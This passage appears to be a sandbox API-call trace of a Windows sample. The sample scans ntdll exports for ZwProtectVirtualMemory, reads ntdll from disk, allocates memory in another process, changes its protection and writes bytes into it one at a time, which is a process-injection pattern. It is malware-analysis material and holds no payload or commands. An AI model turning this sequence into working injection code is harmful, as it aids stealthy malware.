	[0070.536] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrGetDllPath", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrGetFailureData", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrLoadDll", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrLockLoaderLock", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrOpenImageFileOptionsKey", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrProcessRelocationBlock", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrProcessRelocationBlockEx", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptions", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptionsEx", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrQueryImageFileKeyOption", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrQueryModuleServiceTags", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrQueryOptionalDelayLoadedAPI", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrQueryProcessModuleInformation", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrRegisterDllNotification", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrRemoveDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrRemoveLoadAsDataTable", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrResFindResource", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrResFindResourceDirectory", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrResGetRCConfig", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrResRelease", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrResSearchResource", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrResolveDelayLoadedAPI", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrResolveDelayLoadsFromDll", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrRscIsTypeExist", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrSetAppCompatDllRedirectionCallback", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrSetDefaultDllDirectories", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrSetDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrSetDllManifestProber", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrSetImplicitPathOptions", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrSetMUICacheType", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrShutdownProcess", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrShutdownThread", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrStandardizeSystemPath", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrSystemDllInitBlock", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrUnloadAlternateResourceModule", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrUnloadAlternateResourceModuleEx", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrUnloadDll", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrUnlockLoaderLock", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrUnregisterDllNotification", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksum", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksumEx", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrWx86FormatVirtualImage", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrpResGetMappingSize", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="LdrpResGetResourceDirectory", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="MD4Final", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="MD4Init", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="MD4Update", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="MD5Final", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="MD5Init", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="MD5Update", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="NlsAnsiCodePage", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="NlsMbCodePageTag", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="NlsMbOemCodePageTag", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="NtAcceptConnectPort", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="NtAccessCheck", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="NtAccessCheckAndAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="NtAccessCheckByType", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="NtAccessCheckByTypeAndAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.537] lstrcmpA (lpString1="NtAccessCheckByTypeResultList", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarmByHandle", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAddAtom", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAddAtomEx", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAddBootEntry", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAddDriverEntry", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAdjustGroupsToken", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAdjustPrivilegesToken", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAdjustTokenClaimsAndDeviceGroups", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlertResumeThread", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlertThread", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlertThreadByThreadId", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAllocateLocallyUniqueId", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAllocateReserveObject", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAllocateUserPhysicalPages", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAllocateUuids", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAllocateVirtualMemory", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcAcceptConnectPort", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcCancelMessage", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcConnectPort", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcConnectPortEx", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcCreatePort", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcCreatePortSection", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcCreateResourceReserve", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcCreateSectionView", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcCreateSecurityContext", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcDeletePortSection", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcDeleteResourceReserve", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcDeleteSectionView", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcDeleteSecurityContext", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcDisconnectPort", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcImpersonateClientContainerOfPort", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcImpersonateClientOfPort", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcOpenSenderProcess", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcOpenSenderThread", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcQueryInformation", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcQueryInformationMessage", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcRevokeSecurityContext", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcSendWaitReceivePort", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAlpcSetInformation", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtApphelpCacheControl", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAreMappedFilesTheSame", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAssignProcessToJobObject", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.538] lstrcmpA (lpString1="NtAssociateWaitCompletionPacket", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] lstrcmpA (lpString1="NtCallbackReturn", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] lstrcmpA (lpString1="NtCancelIoFile", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] lstrcmpA (lpString1="NtCancelIoFileEx", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] lstrcmpA (lpString1="NtCancelSynchronousIoFile", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] lstrcmpA (lpString1="NtCancelTimer", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] lstrcmpA (lpString1="NtCancelTimer2", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] lstrcmpA (lpString1="NtCancelWaitCompletionPacket", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] lstrcmpA (lpString1="NtClearEvent", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] lstrcmpA (lpString1="NtClose", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] lstrcmpA (lpString1="NtCloseObjectAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] lstrcmpA (lpString1="NtCommitComplete", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] lstrcmpA (lpString1="NtCommitEnlistment", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] lstrcmpA (lpString1="NtCommitTransaction", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] lstrcmpA (lpString1="NtCompactKeys", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] lstrcmpA (lpString1="NtCompareObjects", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] lstrcmpA (lpString1="NtCompareTokens", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] lstrcmpA (lpString1="NtCompleteConnectPort", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] lstrcmpA (lpString1="NtCompressKey", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] lstrcmpA (lpString1="NtConnectPort", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] lstrcmpA (lpString1="NtContinue", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] lstrcmpA (lpString1="NtCreateDebugObject", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.539] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=1) returned 1
	[0070.539] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230
	[0070.540] SetFilePointer (in: hFile=0x230, lDistanceToMove=1002904, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4d98
	[0070.540] ReadFile (in: hFile=0x230, lpBuffer=0x2d0fe0c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x2d0fe10, lpOverlapped=0x0 | out: lpBuffer=0x2d0fe0c*, lpNumberOfBytesRead=0x2d0fe10*=0x4, lpOverlapped=0x0) returned 1
	[0070.540] CloseHandle (hObject=0x230) returned 1
	[0070.540] VirtualAllocEx (hProcess=0x224, lpAddress=0x0, dwSize=0x38, flAllocationType=0x3000, flProtect=0x20) returned 0x500000
	[0070.541] VirtualAllocEx (hProcess=0x224, lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x20) returned 0x510000
	[0070.547] VirtualProtectEx (in: hProcess=0x224, lpAddress=0x510000, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x2d0fec4 | out: lpflOldProtect=0x2d0fec4*=0x20) returned 1
	[0070.547] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x510000, lpBuffer=0x2d0fe64*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe64*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.547] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x510001, lpBuffer=0x2d0fe65*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe65*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.548] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x510002, lpBuffer=0x2d0fe66*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe66*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.548] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x510003, lpBuffer=0x2d0fe67*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe67*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.548] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x510004, lpBuffer=0x2d0fe68*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe68*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.548] VirtualProtectEx (in: hProcess=0x224, lpAddress=0x510000, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x2d0fec4 | out: lpflOldProtect=0x2d0fec4*=0x40) returned 1
	[0070.548] VirtualProtectEx (in: hProcess=0x224, lpAddress=0x500000, dwSize=0x3d, flNewProtect=0x40, lpflOldProtect=0x2d0fec4 | out: lpflOldProtect=0x2d0fec4*=0x20) returned 1
	[0070.548] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500000, lpBuffer=0x2d0fe14*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe14*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.549] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500001, lpBuffer=0x2d0fe15*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe15*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.549] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500002, lpBuffer=0x2d0fe16*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe16*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.549] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500003, lpBuffer=0x2d0fe17*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe17*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.549] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500004, lpBuffer=0x2d0fe18*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe18*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.550] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500005, lpBuffer=0x2d0fe19*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe19*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.550] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500006, lpBuffer=0x2d0fe1a*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe1a*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.550] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500007, lpBuffer=0x2d0fe1b*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe1b*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.550] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500008, lpBuffer=0x2d0fe1c*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe1c*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.551] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500009, lpBuffer=0x2d0fe1d*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe1d*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.551] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x50000a, lpBuffer=0x2d0fe1e*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe1e*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.551] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x50000b, lpBuffer=0x2d0fe1f*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe1f*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.551] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x50000c, lpBuffer=0x2d0fe20*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe20*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.552] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x50000d, lpBuffer=0x2d0fe21*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe21*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.552] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x50000e, lpBuffer=0x2d0fe22*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe22*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.552] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x50000f, lpBuffer=0x2d0fe23*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe23*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.552] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500010, lpBuffer=0x2d0fe24*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe24*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.552] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500011, lpBuffer=0x2d0fe25*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe25*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.553] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500012, lpBuffer=0x2d0fe26*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe26*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.553] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500013, lpBuffer=0x2d0fe27*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe27*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.553] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500014, lpBuffer=0x2d0fe28*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe28*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.553] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500015, lpBuffer=0x2d0fe29*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe29*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.554] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500016, lpBuffer=0x2d0fe2a*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe2a*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.554] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500017, lpBuffer=0x2d0fe2b*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe2b*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.554] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500018, lpBuffer=0x2d0fe2c*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe2c*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.554] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500019, lpBuffer=0x2d0fe2d*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe2d*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.554] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x50001a, lpBuffer=0x2d0fe2e*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe2e*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.555] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x50001b, lpBuffer=0x2d0fe2f*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe2f*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.555] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x50001c, lpBuffer=0x2d0fe30*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe30*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.555] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x50001d, lpBuffer=0x2d0fe31*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe31*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.555] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x50001e, lpBuffer=0x2d0fe32*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe32*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.556] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x50001f, lpBuffer=0x2d0fe33*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe33*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.556] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500020, lpBuffer=0x2d0fe34*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe34*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.556] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500021, lpBuffer=0x2d0fe35*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe35*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.556] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500022, lpBuffer=0x2d0fe36*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe36*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.557] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500023, lpBuffer=0x2d0fe37*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe37*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.557] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500024, lpBuffer=0x2d0fe38*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe38*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.557] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500025, lpBuffer=0x2d0fe39*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe39*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.557] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500026, lpBuffer=0x2d0fe3a*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe3a*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.557] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500027, lpBuffer=0x2d0fe3b*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe3b*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.558] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500028, lpBuffer=0x2d0fe3c*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe3c*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.558] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500029, lpBuffer=0x2d0fe3d*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe3d*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.558] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x50002a, lpBuffer=0x2d0fe3e*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe3e*, lpNumberOfBytesWritten=0x0) returned 1
